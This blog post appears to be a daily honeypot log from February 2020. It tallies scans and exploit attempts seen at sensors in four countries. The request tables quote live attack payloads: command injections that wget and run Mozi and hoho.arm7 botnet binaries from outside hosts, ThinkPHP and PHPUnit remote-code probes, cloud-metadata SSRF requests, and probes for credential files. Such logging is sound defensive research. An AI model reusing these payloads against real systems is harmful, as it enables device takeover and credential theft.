コンニチハレバレトシタアオゾラ

In my idle hours, facing this blog all day long, I aimlessly jot down whatever trifling thoughts drift through my mind,

2020/02/03 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2020/02/03.

Highlights
Location:JP

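The following were observed:
Access targeting a vulnerability in Shenzhen TVT products
Access targeting cloud environment metadata
Scanning by AWS Security Scanner
Scanning for /.aws/credentials
Unauthorized communication involving 18[.]179[.]20[.]5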

Location:US

The following were observed:
Access targeting a vulnerability in Shenzhen TVT products
Scanning for /.env
Scanning for /.git/config

Location:UK

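The following were observed:
Access targeting a vulnerability in NetGear products
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting a vulnerability in Shenzhen TVT products
Access targeting a vulnerability in ThinkPHP
Scanning for /.aws/credentials
Scanning for Apache Solr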

Location:SG

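The following were observed:
Access targeting a vulnerability in Linear eMerge E3 products
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting a vulnerability in Shenzhen TVT products
Access targeting a vulnerability in ThinkPHP
Scanning for Apache Solr
Unauthorized communication involving 123[.]125[.]114[.]144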

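Access count trend

JP: total accesses: 56 (change from previous day: -50)
US: total accesses: 18 (change from previous day: -14)
UK: total accesses: 23 (change from previous day: -3)
SG: total accesses: 27 (change from previous day: +6)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.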

Location:JP

Source IP addresses


User-Agents

Count UserAgent
26 -
1 ApiTool
14 AWS Security Scanner
3 curl/7.47.0
11 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

Requests

Count Method Request Protocol
5 -
10 CONNECT 18[.]179[.]20[.]5:80 HTTP/1.0
3 GET /.aws/credentials HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
2 GET http://169[.]254[.]169[.]254/ HTTP/1.1
2 GET http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document HTTP/1.1
2 GET http://example[.]com/ HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/ HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document HTTP/1.1
1 GET http://www[.]qq[.]com/404/search_children.js HTTP/1.1
1 GET /index.php HTTP/1.1
4 GET /latest/dynamic/instance-identity/document HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
3 GET /TP/public/index.php HTTP/1.1
1 POST /editBlackAndWhiteList HTTP/1.1
1 \x03
10 \x16\x03\x01

Location:US

Source IP addresses


User-Agents

Count UserAgent
9 -
3 ApiTool
4 Go-http-client/1.1
2 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Requests

Count Method Request Protocol
5 -
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com:443 HTTP/1.0
1 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET ../../ HTTP
2 GET ../../proc/ HTTP
1 GET /v2/_catalog HTTP/1.1
3 POST /editBlackAndWhiteList HTTP/1.1
1 \x03

Location:UK

Source IP addresses


User-Agents

Count UserAgent
11 -
2 ApiTool
3 curl/7.47.0
1 Go-http-client/1.1
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

Requests

Count Method Request Protocol
6 -
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
3 GET /.aws/credentials HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET ../../proc/ HTTP
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://106[.]124[.]178[.]81:48505/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
2 POST /editBlackAndWhiteList HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \x03

Location:SG

Source IP addresses


User-Agents

Count UserAgent
7 -
2 ApiTool
1 Go-http-client/1.1
1 Mozilla/5.0
1 Mozilla/5.01719037 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

Requests

Count Method Request Protocol
4 -
1 CONNECT cn[.]bing[.]com:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com:443 HTTP/1.1
1 CONNECT www[.]ipip[.]net:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com:443 HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7;
1 GET http://boxun[.]com/ HTTP/1.1
1 GET http://www[.]123cha[.]com/ HTTP/1.1
1 GET http://www[.]epochtimes[.]com/ HTTP/1.1
1 GET http://www[.]minghui[.]org/ HTTP/1.1
1 GET http://www[.]rfa[.]org/english/ HTTP/1.1
1 GET http://www[.]wujieliulan[.]com/ HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET ../../proc/ HTTP
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /webdav/ HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 HEAD http://123[.]125[.]114[.]144/ HTTP/1.1
2 POST /editBlackAndWhiteList HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \x03